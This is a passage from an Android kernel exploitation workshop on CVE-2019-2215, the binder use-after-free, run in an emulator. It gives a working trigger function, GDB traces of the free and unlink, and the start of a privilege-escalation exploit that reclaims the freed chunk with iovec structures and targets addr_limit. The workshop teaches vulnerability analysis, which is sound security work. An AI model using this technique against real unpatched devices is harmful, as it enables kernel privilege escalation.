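#endif

/* Hypothetical helper replaying the PoC steps against dev_path
 * (normally "/dev/binder" on the vulnerable emulator):
 *   open()                    -> binder_open allocates binder_proc
 *   epoll_ctl(ADD)            -> binder_poll allocates binder_thread
 *   ioctl(BINDER_THREAD_EXIT) -> binder_thread is freed
 *   epoll_ctl(DEL), if asked  -> ep_remove uses the dangling chunk
 * Without del_now, the use happens when the epoll file is released
 * (the close() below, or process exit as in the crash log).
 * Returns 0 if every call succeeded, -1 otherwise. */
int binder_uaf_trigger(const char *dev_path, int del_now)
{
    struct epoll_event event = { .events = EPOLLIN };  /* assumed event mask */
    int ret = -1;

    int fd = open(dev_path, O_RDONLY);
    if (fd < 0)
        return -1;
    int epfd = epoll_create(1000);
    if (epfd < 0) {
        close(fd);
        return -1;
    }
    if (epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event) < 0)
        goto out;
    if (ioctl(fd, BINDER_THREAD_EXIT, NULL) < 0)
        goto out;
    if (del_now && epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event) < 0)
        goto out;
    ret = 0;
out:
    close(epfd);
    close(fd);
    return ret;
}
```

Passing del_now = 1 reproduces the EPOLL_CTL_DEL path discussed under ep_remove. Passing 0 leaves the use to the release of the epoll file.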

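Dynamic Analysis

In this section we will look at how to use GDB automation to understand the crash behavior.

Before we start, we need to make a hardware change to the CVE-2019-2215 Android Virtual Device that we created in the Android Virtual Device section.

We also need to build the Android kernel without KASan, because we don't need KASan support at this point.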

CPU

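For better GDB debugging and tracing support, it is recommended to set the number of CPU cores to 1.

Open ~/.android/avd/CVE-2019-2215.avd/config.ini in a text editor and change the line hw.cpu.ncore = 4 to hw.cpu.ncore = 1.

Building the Kernel Without KASan

This part is exactly the same as building the kernel with KASan, but this time we use a different configuration file.

The configuration file is workshop/build-configs/goldfish.x86_64.relwithdebinfo.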

ARCH=x86_64

BRANCH=relwithdebinfo

CC=clang

CLANG_PREBUILT_BIN=prebuilts-master/clang/host/linux-x86/clang-r377782b/bin

BUILDTOOLS_PREBUILT_BIN=build/build-tools/path/linux-x86

CLANG_TRIPLE=x86_64-linux-gnu-

CROSS_COMPILE=x86_64-linux-androidkernel-

LINUX_GCC_CROSS_COMPILE_PREBUILTS_BIN=prebuilts/gcc/linux-x86/x86/x86_64-linux-android-4.9/bin

KERNEL_DIR=goldfish

EXTRA_CMDS=''

STOP_SHIP_TRACEPRINTK=1

FILES="

arch/x86/boot/bzImage

vmlinux

System.map

"

DEFCONFIG=x86_64_ranchu_defconfig

POST_DEFCONFIG_CMDS="check_defconfig && update_debug_config"

function update_debug_config() {

${KERNEL_DIR}/scripts/config --file ${OUT_DIR}/.config \

-e CONFIG_FRAME_POINTER \

-e CONFIG_DEBUG_INFO \

-d CONFIG_DEBUG_INFO_REDUCED \

-d CONFIG_KERNEL_LZ4 \

-d CONFIG_RANDOMIZE_BASE

(cd ${OUT_DIR} && \

make O=${OUT_DIR} $archsubarch CROSS_COMPILE=${CROSS_COMPILE} olddefconfig)

}

Now let's use this configuration file and start the build.

ashfaq@hacksys:~/workshop/android-4.14-dev$ BUILD_CONFIG=../build-configs/goldfish.x86_64.relwithdebinfo build/build.sh

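Kernel Tracing

Our goal is to use GDB Python breakpoint automation to trace the function calls and dump the binder_thread chunk before and after it is freed. We also want to dump the same binder_thread structure before and after the unlink operation completes.

The Python file ~/workshop/gdb/dynamic-analysis.py contains some debugging automation I wrote to debug this vulnerability at runtime.

Let's boot the emulator with the newly compiled kernel.

Note: the patch that reintroduces the vulnerability has already been applied.

This time we need four terminal windows. Open the first terminal window and start the emulator.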

ashfaq@hacksys:~/workshop$ emulator -show-kernel -no-snapshot -wipe-data -avd CVE-2019-2215 -kernel ~/workshop/android-4.14-dev/out/relwithdebinfo/dist/bzImage -qemu -s -S

In the second window, we attach GDB to the qemu instance.

ashfaq@hacksys:~/workshop$ gdb -quiet ~/workshop/android-4.14-dev/out/relwithdebinfo/dist/vmlinux -ex 'target remote :1234'
GEF for linux ready, type `gef' to start, `gef config' to configure
77 commands loaded for GDB 8.2 using Python engine 2.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from /home/ashfaq/workshop/android-4.14-dev/out/kasan/dist/vmlinux...done.
Remote debugging using :1234
warning: while parsing target description (at line 1): Could not load XML document "i386-64bit.xml"
warning: Could not load XML target description; ignoring
0x000000000000fff0 in exception_stacks ()
gef> c
Continuing.

Once Android has fully booted, open the third terminal window. There we build the vulnerability trigger and push it to the virtual device.

ashfaq@hacksys:~/workshop$ cd exploit/
ashfaq@hacksys:~/workshop/exploit$ NDK_ROOT=~/Android/Sdk/ndk/21.0.6113669 make build-trigger push-trigger
Building: cve-2019-2215-trigger
Pushing: cve-2019-2215-trigger to /data/local/tmp
cve-2019-2215-trigger: 1 file pushed, 0 skipped. 44.8 MB/s (3958288 bytes in 0.084s)

Now, in the GDB window, press CTRL+C to break into GDB so that we can load the custom Python script.

dynamic-analysis.py, the automation built on GDB's Python scripting support, is located in workshop/gdb.

gef> c
Continuing.
^C
Program received signal SIGINT, Interrupt.
native_safe_halt () at /home/ashfaq/workshop/android-4.14-dev/goldfish/arch/x86/include/asm/irqflags.h:61
61 }
gef> source ~/workshop/gdb/dynamic-analysis.py
Breakpoint 1 at 0xffffffff80824047: file /home/ashfaq/workshop/android-4.14-dev/goldfish/drivers/android/binder.c, line 4701.
Breakpoint 2 at 0xffffffff802aa586: file /home/ashfaq/workshop/android-4.14-dev/goldfish/kernel/sched/wait.c, line 50.
gef> c
Continuing.

Now open the fourth terminal window, start an adb shell and run the trigger PoC.

ashfaq@hacksys:~/workshop/exploit$ adb shell
generic_x86_64:/ $ cd /data/local/tmp
generic_x86_64:/data/local/tmp $ ./cve-2019-2215-trigger
generic_x86_64:/data/local/tmp $

Once the trigger PoC has run, you will see the following output in the GDB terminal window.

binder_free_thread(thread=0xffff88800c18f200)(enter)
0xffff88800c18f200: 0xffff88806793c000 0x0000000000000001
0xffff88800c18f210: 0x0000000000000000 0x0000000000000000
0xffff88800c18f220: 0xffff88800c18f220 0xffff88800c18f220
0xffff88800c18f230: 0x0000002000001b35 0x0000000000000001
0xffff88800c18f240: 0x0000000000000000 0xffff88800c18f248
0xffff88800c18f250: 0xffff88800c18f248 0x0000000000000000
0xffff88800c18f260: 0x0000000000000000 0x0000000000000000
0xffff88800c18f270: 0x0000000000000003 0x0000000000007201
0xffff88800c18f280: 0x0000000000000000 0x0000000000000000
0xffff88800c18f290: 0x0000000000000003 0x0000000000007201
0xffff88800c18f2a0: 0x0000000000000000 0xffff88805c05cae0
0xffff88800c18f2b0: 0xffff88805c05cae0 0x0000000000000000
0xffff88800c18f2c0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2d0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2e0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2f0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f300: 0x0000000000000000 0x0000000000000000
0xffff88800c18f310: 0x0000000000000000 0x0000000000000000
0xffff88800c18f320: 0x0000000000000000 0x0000000000000000
0xffff88800c18f330: 0x0000000000000000 0x0000000000000000
0xffff88800c18f340: 0x0000000000000000 0x0000000000000000
0xffff88800c18f350: 0x0000000000000000 0x0000000000000000
0xffff88800c18f360: 0x0000000000000000 0x0000000000000000
0xffff88800c18f370: 0x0000000000000000 0x0000000000000000
0xffff88800c18f380: 0x0000000000000000 0x0000000000000001
0xffff88800c18f390: 0xffff88806d4bb200
remove_wait_queue(wq_head=0xffff88800c18f2a0, wq_entry=0xffff88805c05cac8)(enter)
0xffff88800c18f200: 0xffff88800c18f600 0x0000000000000001
0xffff88800c18f210: 0x0000000000000000 0x0000000000000000
0xffff88800c18f220: 0xffff88800c18f220 0xffff88800c18f220
0xffff88800c18f230: 0x0000002000001b35 0x0000000000000001
0xffff88800c18f240: 0x0000000000000000 0xffff88800c18f248
0xffff88800c18f250: 0xffff88800c18f248 0x0000000000000000
0xffff88800c18f260: 0x0000000000000000 0x0000000000000000
0xffff88800c18f270: 0x0000000000000003 0x0000000000007201
0xffff88800c18f280: 0x0000000000000000 0x0000000000000000
0xffff88800c18f290: 0x0000000000000003 0x0000000000007201
0xffff88800c18f2a0: 0x0000000000000000 0xffff88805c05cae0
0xffff88800c18f2b0: 0xffff88805c05cae0 0x0000000000000000
0xffff88800c18f2c0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2d0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2e0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2f0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f300: 0x0000000000000000 0x0000000000000000
0xffff88800c18f310: 0x0000000000000000 0x0000000000000000
0xffff88800c18f320: 0x0000000000000000 0x0000000000000000
0xffff88800c18f330: 0x0000000000000000 0x0000000000000000
0xffff88800c18f340: 0x0000000000000000 0x0000000000000000
0xffff88800c18f350: 0x0000000000000000 0x0000000000000000
0xffff88800c18f360: 0x0000000000000000 0x0000000000000000
0xffff88800c18f370: 0x0000000000000000 0x0000000000000000
0xffff88800c18f380: 0x0000000000000000 0x0000000000000001
0xffff88800c18f390: 0xffff88806d4bb200
Breakpoint 3 at 0xffffffff802aa5be: file /home/ashfaq/workshop/android-4.14-dev/goldfish/kernel/sched/wait.c, line 53.
remove_wait_queue_wait.c:52(exit)
0xffff88800c18f200: 0xffff88800c18f600 0x0000000000000001
0xffff88800c18f210: 0x0000000000000000 0x0000000000000000
0xffff88800c18f220: 0xffff88800c18f220 0xffff88800c18f220
0xffff88800c18f230: 0x0000002000001b35 0x0000000000000001
0xffff88800c18f240: 0x0000000000000000 0xffff88800c18f248
0xffff88800c18f250: 0xffff88800c18f248 0x0000000000000000
0xffff88800c18f260: 0x0000000000000000 0x0000000000000000
0xffff88800c18f270: 0x0000000000000003 0x0000000000007201
0xffff88800c18f280: 0x0000000000000000 0x0000000000000000
0xffff88800c18f290: 0x0000000000000003 0x0000000000007201
0xffff88800c18f2a0: 0x0000000000000000 0xffff88800c18f2a8
0xffff88800c18f2b0: 0xffff88800c18f2a8 0x0000000000000000
0xffff88800c18f2c0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2d0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2e0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f2f0: 0x0000000000000000 0x0000000000000000
0xffff88800c18f300: 0x0000000000000000 0x0000000000000000
0xffff88800c18f310: 0x0000000000000000 0x0000000000000000
0xffff88800c18f320: 0x0000000000000000 0x0000000000000000
0xffff88800c18f330: 0x0000000000000000 0x0000000000000000
0xffff88800c18f340: 0x0000000000000000 0x0000000000000000
0xffff88800c18f350: 0x0000000000000000 0x0000000000000000
0xffff88800c18f360: 0x0000000000000000 0x0000000000000000
0xffff88800c18f370: 0x0000000000000000 0x0000000000000000
0xffff88800c18f380: 0x0000000000000000 0x0000000000000001
0xffff88800c18f390: 0xffff88806d4bb200

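Now let's analyze the output and try to understand what happened.

Recall that binder_free_thread is the function that finally frees the binder_thread structure.

After the free, but before the unlink operation on the binder_thread structure:

0xffff88800c18f2a0: 0x0000000000000000 0xffff88805c05cae0
0xffff88800c18f2b0: 0xffff88805c05cae0 0x0000000000000000

0xffff88800c18f2a0 + 0x8 is the address of binder_thread->wait.head, which is linked to eppoll_entry->wait.entry.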

gef> p offsetof(struct binder_thread, wait.head)
$1 = 0xa8
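The GDB result can be cross-checked with a little arithmetic. In this sketch, mock_wait_queue_head is a hypothetical layout. It is assumed to match wait_queue_head on this x86_64 build without spinlock debugging: a 4-byte spinlock, padded so that the list_head starts at offset 8. The 0xa0 offset of binder_thread->wait comes from the log line remove_wait_queue(wq_head=0xffff88800c18f2a0), recorded for the thread at 0xffff88800c18f200.

```c
#include <stddef.h>
#include <stdint.h>

/* Hypothetical layout assumed to mirror wait_queue_head on this build. */
struct mock_list_head { struct mock_list_head *next, *prev; };
struct mock_wait_queue_head {
    uint32_t lock;                 /* spinlock_t, 4 bytes without debugging */
    struct mock_list_head head;    /* aligned to 8, so it sits at offset 8 */
};

/* Offset of binder_thread->wait, taken from the GDB log (0x...2a0 - 0x...200). */
#define BINDER_THREAD_WAIT_OFF 0xa0ULL

/* Address of binder_thread->wait.head for a binder_thread at `thread`. */
uint64_t wait_head_addr(uint64_t thread)
{
    return thread + BINDER_THREAD_WAIT_OFF +
           offsetof(struct mock_wait_queue_head, head);
}
```

With these assumptions, 0xa0 + 0x8 = 0xa8 agrees with the offsetof value printed by GDB. wait_head_addr(0xffff88800c18f200) yields 0xffff88800c18f2a8, the value that the unlink writes back into the chunk.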

0xffff88805c05cae0 is a pointer to eppoll_entry->wait.entry, which is of type struct list_head.

After the unlink operation on the binder_thread structure:

0xffff88800c18f2a0: 0x0000000000000000 0xffff88800c18f2a8
0xffff88800c18f2b0: 0xffff88800c18f2a8 0x0000000000000000

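If you look closely at the unlink operation, you will see that a pointer to binder_thread->wait.head is written into both binder_thread->wait.head.next and binder_thread->wait.head.prev.

This is exactly what we derived in the Static Analysis section.

0x02 Exploit Development

In the Root Cause Analysis section we analyzed the cause of the vulnerability. We know that the dangling binder_thread chunk is used in two places.

The first use happens when remove_wait_queue tries to acquire the spinlock.

The second use happens inside __remove_wait_queue, when it tries to unlink the wait queue entry. This gives us a primitive that writes a pointer to binder_thread->wait.head into binder_thread->wait.head.next and binder_thread->wait.head.prev.

Let's look again at struct binder_thread, defined in workshop/android-4.14-dev/goldfish/drivers/android/binder.c.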

struct binder_thread {

struct binder_proc *proc;

struct rb_node rb_node;

struct list_head waiting_thread_node;

int pid;

int looper; /* only modified by this thread */

bool looper_need_return; /* can be written by other thread */

struct binder_transaction *transaction_stack;

struct list_head todo;

bool process_todo;

struct binder_error return_error;

struct binder_error reply_error;

wait_queue_head_t wait;

struct binder_stats stats;

atomic_t tmp_ref;

bool is_dead;

struct task_struct *task;

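};

If you look closely, you will see that a pointer to struct task_struct is also a member of the binder_thread structure.

If we can leak it somehow, we will know where the task_struct of the current process is located.

Note: see the Linux Privilege Escalation section to learn more about the task_struct structure and Linux privilege escalation.

Now let's see how to exploit this vulnerability. As exploit mitigations keep multiplying, it is very important to build a solid base primitive.

Prerequisites

task_struct contains an important member addr_limit of type mm_segment_t, which stores the highest valid user space address.

Depending on the target architecture, addr_limit lives in either struct thread_info or struct thread_struct. We are dealing with an x86_64 system, where addr_limit is defined in struct thread_struct, which is part of the task_struct structure.

To understand addr_limit better, let's look at the prototypes of the read and write system calls.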

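ssize_t read(int fd, void *buf, size_t count);
ssize_t write(int fd, const void *buf, size_t count);

read and write accept a pointer to a user space buffer, and this is where addr_limit comes in. These system calls use the access_ok function to verify that the passed address really is a user space address and is accessible.

Since we are on an x86_64 system, let's open workshop/android-4.14-dev/goldfish/arch/x86/include/asm/uaccess.h and see how access_ok is defined.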

#define access_ok(type, addr, size) \

({ \

WARN_ON_IN_IRQ(); \

likely(!__range_not_ok(addr, size, user_addr_max())); \

})

#define user_addr_max() (current->thread.addr_limit.seg)正如你所看到user_addr_max的用途current->thread.addr_limit.seg。如果这个addr_limit是0xFFFFFFFFFFFFFFFF,我们将能够读取和写入的任何部分内核空间的内存。
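The range check can be modeled in user space to show why raising addr_limit matters. This is a simplified sketch of the x86_64 logic behind __range_not_ok, not the kernel macro itself. Two assumptions apply:

- USER_DS_LIMIT assumes 4-level paging, where TASK_SIZE_MAX is (1 << 47) - 4096.
- The limit parameter stands in for current->thread.addr_limit.seg.

```c
#include <stdbool.h>
#include <stdint.h>

/* Assumed limits; `limit` below plays the role of addr_limit.seg. */
#define USER_DS_LIMIT   ((1ULL << 47) - 4096)   /* x86_64 TASK_SIZE_MAX, 4-level paging */
#define KERNEL_DS_LIMIT UINT64_MAX              /* 0xFFFFFFFFFFFFFFFF */
#define EXPLOIT_LIMIT   (UINT64_MAX - 1)        /* 0xFFFFFFFFFFFFFFFE */

/* True if [addr, addr + size) is NOT acceptable under limit. */
static bool range_not_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    uint64_t end = addr + size;
    if (end < size)          /* addr + size wrapped around */
        return true;
    return end > limit;
}

/* Simplified access_ok(): accept the range only if it is below the limit. */
bool access_ok_model(uint64_t addr, uint64_t size, uint64_t limit)
{
    return !range_not_ok(addr, size, limit);
}
```

Under USER_DS_LIMIT, a kernel address such as 0xffff88800c18f2a8 is rejected. Once the limit is raised to 0xFFFFFFFFFFFFFFFE, the same address passes, while ranges that wrap around the address space are still refused.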

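Note: Vitaly Nikolenko (@vnik5287) pointed out that on arm64 there is a check in the do_page_fault function that crashes the process if addr_limit is set to 0xFFFFFFFFFFFFFFFF. I did all my testing on an x86_64 system, so I did not notice this at first.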

Let's open workshop/android-4.14-dev/goldfish/arch/arm64/mm/fault.c and study the do_page_fault function.

static int __kprobes do_page_fault(unsigned long addr, unsigned int esr,
                                   struct pt_regs *regs)
{
    struct task_struct *tsk;
    struct mm_struct *mm;
    int fault, sig, code, major = 0;
    unsigned long vm_flags = VM_READ | VM_WRITE;
    unsigned int mm_flags = FAULT_FLAG_ALLOW_RETRY | FAULT_FLAG_KILLABLE;

    [...]

    if (is_ttbr0_addr(addr) && is_permission_fault(esr, regs, addr)) {
        /* regs->orig_addr_limit may be 0 if we entered from EL0 */
        if (regs->orig_addr_limit == KERNEL_DS)
            die("Accessing user space memory with fs=KERNEL_DS", regs, esr);

        [...]
    }

    [...]

    return 0;
}

· If a permission fault on a user-space (TTBR0) address happens while orig_addr_limit == KERNEL_DS, the kernel calls die() and crashes; KERNEL_DS = 0xFFFFFFFFFFFFFFFF

For better compatibility of the exploit across x86_64 and arm64, it is best to set addr_limit to 0xFFFFFFFFFFFFFFFE.
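The effect of addr_limit on access_ok can be modeled in a few lines of user-space C. This is a simplified sketch, assuming the non-constant-size branch of x86's __chk_range_not_ok() and the x86_64 USER_DS value for 4-level paging ((1 << 47) - PAGE_SIZE); all function and macro names are hypothetical. The arm64 part models only the addr_limit comparison of the do_page_fault() check; the real check also requires a permission fault on a TTBR0 address.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* x86_64 USER_DS with 4-level paging: TASK_SIZE_MAX = (1 << 47) - PAGE_SIZE */
#define USER_DS_X86_64     ((1ULL << 47) - 4096ULL)
#define KERNEL_DS_VALUE    0xFFFFFFFFFFFFFFFFULL
#define EXPLOIT_ADDR_LIMIT 0xFFFFFFFFFFFFFFFEULL

/* Non-constant-size branch of x86 __chk_range_not_ok(): true = reject */
static bool range_not_ok(uint64_t addr, uint64_t size, uint64_t limit)
{
    uint64_t end = addr + size;
    if (end < size) /* addr + size wrapped around */
        return true;
    return end > limit;
}

/* access_ok() as seen through current->thread.addr_limit.seg */
static bool access_ok_model(uint64_t addr, uint64_t size, uint64_t addr_limit)
{
    return !range_not_ok(addr, size, addr_limit);
}

/* Only the addr_limit comparison of the arm64 do_page_fault() check */
static bool arm64_check_would_die(uint64_t orig_addr_limit)
{
    return orig_addr_limit == KERNEL_DS_VALUE;
}
```

With the normal user limit, a kernel address such as the task_struct pointer from the sample run later in this article is rejected; with 0xFFFFFFFFFFFFFFFE it is accepted, and that value is still not equal to KERNEL_DS.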

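Using this vulnerability, we want to corrupt addr_limit and upgrade our limited primitive into a more powerful one: an arbitrary read/write primitive.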

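An arbitrary read/write primitive enables a data-only attack: we do not hijack the CPU's control flow, we only corrupt target data structures to escalate privileges in the kernel.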

Finding a Target

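Vectored I/O lets a single call read data from one source into multiple buffers, or write data from multiple buffers to one destination. This reduces the overhead of issuing multiple read or write system calls when we need to handle multiple buffers.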

In Linux, vectored I/O is implemented with the iovec structure and system calls such as readv, writev, recvmsg and sendmsg.

Let's look at the definition of struct iovec in workshop/android-4.14-dev/goldfish/include/uapi/linux/uio.h.

struct iovec
{
    void __user *iov_base;   /* BSD uses caddr_t (1003.1g requires void *) */
    __kernel_size_t iov_len; /* Must be size_t (1003.1g) */
};

To better understand how vectored I/O and iovec work, let's look at the diagram below.

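Advantages of struct iovec

· Small: on a 64-bit system its size is 0x10 bytes

· We control all of its members, iov_base and iov_len

· We can stack them together to target the desired kmalloc cache

· It holds a pointer to a buffer, which is a useful exploitation primitive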
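As a reminder of how vectored I/O looks from user space, the following sketch gathers two separate buffers into a pipe with a single writev() call and reads them back as one contiguous stream. It uses only standard POSIX calls; the helper name is illustrative.

```c
#define _GNU_SOURCE
#include <assert.h>
#include <string.h>
#include <sys/types.h>
#include <sys/uio.h>
#include <unistd.h>

/* Writes "hello, " and "iov" from two separate buffers with one writev()
 * call, then reads the pipe back into `out` (out_len should be >= 10).
 * Returns the number of bytes read, or -1 on error. */
static ssize_t gather_two_buffers(char *out, size_t out_len)
{
    int fds[2];
    char part1[] = "hello, ";
    char part2[] = "iov";
    struct iovec iov[2] = {
        { .iov_base = part1, .iov_len = strlen(part1) },
        { .iov_base = part2, .iov_len = strlen(part2) },
    };

    if (pipe(fds) == -1)
        return -1;

    /* One system call, two source buffers */
    ssize_t written = writev(fds[1], iov, 2);
    ssize_t nread = -1;
    if (written == (ssize_t)(iov[0].iov_len + iov[1].iov_len))
        nread = read(fds[0], out, out_len);

    close(fds[0]);
    close(fds[1]);
    return nread;
}
```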

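One of the main problems is that struct iovec is short-lived: the array is allocated by the system call while the buffers are being used and freed as soon as the call returns to user mode.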

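We want the iovec structures to stay in the kernel while we trigger the unlink operation, so that iov_base gets overwritten with the address of binder_thread->wait.head and gives us a scoped read/write.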

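Note: We are using the Android 4.14 kernel, but the Project Zero team wrote their exploit for the Android 4.4 kernel, which does not have the additional access_ok checks in lib/iov_iter.c. We have therefore applied a patch that reverts those extra checks, which would otherwise prevent us from leaking kernel-space memory chunks.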

How do we keep the iovec structures in the kernel until we trigger the unlink operation?

One way is to call readv or writev on a pipe file descriptor, because these calls block when the pipe is empty (readv) or full (writev).

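A pipe is a unidirectional data channel that can be used for inter-process communication. The blocking behavior of pipes gives us a crucial time window in which to corrupt the iovec structures in kernel space.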

In the same way, we can make the recvmsg system call block by passing MSG_WAITALL as its flags argument.

Let's dig into the writev system call and figure out how it uses the iovec structure.

Open workshop/android-4.14-dev/goldfish/fs/read_write.c and study it.

SYSCALL_DEFINE3(writev, unsigned long, fd, const struct iovec __user *, vec,
                unsigned long, vlen)
{
    return do_writev(fd, vec, vlen, 0);
}

static ssize_t do_writev(unsigned long fd, const struct iovec __user *vec,
                         unsigned long vlen, rwf_t flags)
{
    struct fd f = fdget_pos(fd);
    ssize_t ret = -EBADF;

    if (f.file) {
        [...]
        ret = vfs_writev(f.file, vec, vlen, &pos, flags);
        [...]
    }

    [...]

    return ret;
}

static ssize_t vfs_writev(struct file *file, const struct iovec __user *vec,
                          unsigned long vlen, loff_t *pos, rwf_t flags)
{
    struct iovec iovstack[UIO_FASTIOV];
    struct iovec *iov = iovstack;
    struct iov_iter iter;
    ssize_t ret;

    ret = import_iovec(WRITE, vec, vlen, ARRAY_SIZE(iovstack), &iov, &iter);
    if (ret >= 0) {
        [...]
        ret = do_iter_write(file, &iter, pos, flags);
        [...]
    }

    return ret;
}

· writev passes the user-space iovec pointer to do_writev

· do_writev passes the same information, along with some additional parameters, to vfs_writev

· vfs_writev passes the same information, along with some additional parameters, to import_iovec

Let's open workshop/android-4.14-dev/goldfish/lib/iov_iter.c and look at the implementation of import_iovec.

int import_iovec(int type, const struct iovec __user * uvector,
                 unsigned nr_segs, unsigned fast_segs,
                 struct iovec **iov, struct iov_iter *i)
{
    ssize_t n;
    struct iovec *p;

    n = rw_copy_check_uvector(type, uvector, nr_segs, fast_segs,
                              *iov, &p);
    [...]
    iov_iter_init(i, type, p, nr_segs, n);
    *iov = p == *iov ? NULL : p;
    return 0;
}

· import_iovec passes the same iovec information, along with some other parameters, to rw_copy_check_uvector

· It initializes the iov_iter that describes the kernel copy of the iovec array by calling iov_iter_init

Let's open workshop/android-4.14-dev/goldfish/fs/read_write.c and look at the implementation of rw_copy_check_uvector.

ssize_t rw_copy_check_uvector(int type, const struct iovec __user * uvector,
                              unsigned long nr_segs, unsigned long fast_segs,
                              struct iovec *fast_pointer,
                              struct iovec **ret_pointer)
{
    unsigned long seg;
    ssize_t ret;
    struct iovec *iov = fast_pointer;

    [...]

    if (nr_segs > fast_segs) {
        iov = kmalloc(nr_segs*sizeof(struct iovec), GFP_KERNEL);
        [...]
    }

    if (copy_from_user(iov, uvector, nr_segs*sizeof(*uvector))) {
        [...]
    }

    [...]

    ret = 0;
    for (seg = 0; seg < nr_segs; seg++) {
        void __user *buf = iov[seg].iov_base;
        ssize_t len = (ssize_t)iov[seg].iov_len;

        [...]

        if (type >= 0
            && unlikely(!access_ok(vrfy_dir(type), buf, len))) {
            [...]
        }

        if (len > MAX_RW_COUNT - ret) {
            len = MAX_RW_COUNT - ret;
            iov[seg].iov_len = len;
        }
        ret += len;
    }

    [...]

    return ret;
}

· When nr_segs exceeds fast_segs (the size of the on-stack iovstack, UIO_FASTIOV), rw_copy_check_uvector allocates kernel-space memory of size nr_segs*sizeof(struct iovec)

· Here, nr_segs is the number of iovec structures in the array we pass from user space

· It copies the iovec array from user space into the newly allocated kernel memory by calling copy_from_user

· It validates each iov_base pointer by calling access_ok
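The allocation decision in rw_copy_check_uvector() can be summarized as a small model. This sketch assumes UIO_FASTIOV = 8 (its value in include/uapi/linux/uio.h) and a 64-bit build where sizeof(struct iovec) is 16; the helper name is hypothetical. Arrays of up to 8 entries stay in the on-stack iovstack[], so only larger arrays, such as the 25-entry array used in this exploit, are allocated with kmalloc.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/uio.h>

/* Assumed value of UIO_FASTIOV (include/uapi/linux/uio.h). */
#define UIO_FASTIOV_MODEL 8

/* Models rw_copy_check_uvector(): up to UIO_FASTIOV entries are copied into
 * the caller's on-stack iovstack[], larger arrays into
 * kmalloc(nr_segs * sizeof(struct iovec)). Returns the kmalloc request
 * size, or 0 when the on-stack array is used. */
static size_t iovec_kmalloc_size(unsigned long nr_segs)
{
    if (nr_segs > UIO_FASTIOV_MODEL)
        return nr_segs * sizeof(struct iovec);
    return 0;
}
```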

Leaking task_struct *

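Let's look at the strategy for leaking the task_struct pointer stored in binder_thread. This time we use the writev system call, because we want a scoped read from kernel space to user space.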

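The binder_thread structure is 408 bytes. If you are familiar with the SLUB allocator, you know that kmalloc-512 holds all objects larger than 256 bytes and up to 512 bytes. Since binder_thread is 408 bytes, it ends up in the kmalloc-512 cache.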

First, we need to figure out how many iovec structures are needed to reallocate the freed binder_thread chunk.

gef> p /d sizeof(struct binder_thread)
$4 = 408
gef> p /d sizeof(struct iovec)
$5 = 16
gef> p /d sizeof(struct binder_thread) / sizeof(struct iovec)
$9 = 25
gef> p /d 25*16
$16 = 400

So we need 25 iovec structures to reallocate the dangling chunk.

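Note: 25 iovec structures occupy 400 bytes. This is good: otherwise the task_struct pointer (the last 8 bytes of binder_thread) would also be overwritten and we would not be able to leak it.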
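The arithmetic above can be checked with a short sketch. It assumes the usual generic kmalloc size classes of an x86_64 SLUB kernel (including the 96- and 192-byte caches); the table and helper names are illustrative. Both the 408-byte binder_thread and the 400-byte iovec array map to kmalloc-512, so the iovec array can reclaim the freed chunk.

```c
#include <assert.h>
#include <stddef.h>

/* Illustrative generic kmalloc size classes (SLUB, x86_64). */
static const size_t kmalloc_classes[] = {
    8, 16, 32, 64, 96, 128, 192, 256, 512, 1024, 2048, 4096, 8192
};

/* Smallest generic cache able to hold `size` bytes, or 0 if none fits. */
static size_t kmalloc_cache_for(size_t size)
{
    size_t n = sizeof(kmalloc_classes) / sizeof(kmalloc_classes[0]);
    for (size_t i = 0; i < n; i++) {
        if (size <= kmalloc_classes[i])
            return kmalloc_classes[i];
    }
    return 0;
}

/* How many whole iovecs fit in the object: 408 / 16 = 25 (400 bytes),
 * leaving the trailing 8-byte task pointer untouched. */
static size_t iovecs_that_fit(size_t object_size, size_t iovec_size)
{
    return object_size / iovec_size;
}
```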

Recall that the unlink operation writes two quadwords into the dangling chunk. Let's find out which iovec structures they will corrupt.

gef> p /d offsetof(struct binder_thread, wait) / sizeof(struct iovec)
$13 = 10

From the output above, we can see that iovecStack[10].iov_len and iovecStack[11].iov_base will be clobbered.
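The mapping from byte offsets to iovec fields can be made explicit. This sketch assumes binder_thread->wait sits at offset 0xA0 (160), which is consistent with the offsetof(...) / sizeof(struct iovec) == 10 result above, and that wait_queue_head_t on x86_64 is a 4-byte spinlock (padded to 8) followed by struct list_head head; the macros and helper are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <sys/uio.h>

/* Assumed offset of binder_thread->wait (consistent with the gef output). */
#define WAIT_OFFSET      0xA0
/* Assumed wait_queue_head_t layout: 4-byte spinlock (+4 padding), then
 * struct list_head head { next, prev }. */
#define WAIT_LOCK_OFFSET (WAIT_OFFSET + 0)
#define WAIT_NEXT_OFFSET (WAIT_OFFSET + 8)
#define WAIT_PREV_OFFSET (WAIT_OFFSET + 16)

/* Maps a byte offset in the reallocated chunk to the iovec index and the
 * field that covers it (0 = iov_base, 1 = iov_len). */
static void offset_to_iovec_field(size_t off, size_t *index, int *field)
{
    *index = off / sizeof(struct iovec);
    *field = (off % sizeof(struct iovec)) >= offsetof(struct iovec, iov_len);
}
```

Under these assumptions the lock lands in the low half of iovecStack[10].iov_base, head.next in iovecStack[10].iov_len and head.prev in iovecStack[11].iov_base.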

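So we want writev to process iovecStack[10], block, and only then trigger the unlink operation. This ensures that writev resumes after iovecStack[11].iov_base has been clobbered. Finally, the contents of the binder_thread chunk are leaked back to user space, and we read the task_struct pointer from them.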

But what is m_4gb_aligned_page for in this case?

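Before performing the unlink operation, remove_wait_queue tries to acquire the spinlock. If the lock value is not 0, the thread keeps spinning and the unlink operation never happens. The lock overlaps iovecStack[10].iov_base, which is a 64-bit value, so we want to make sure that its lower 32 bits are 0.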
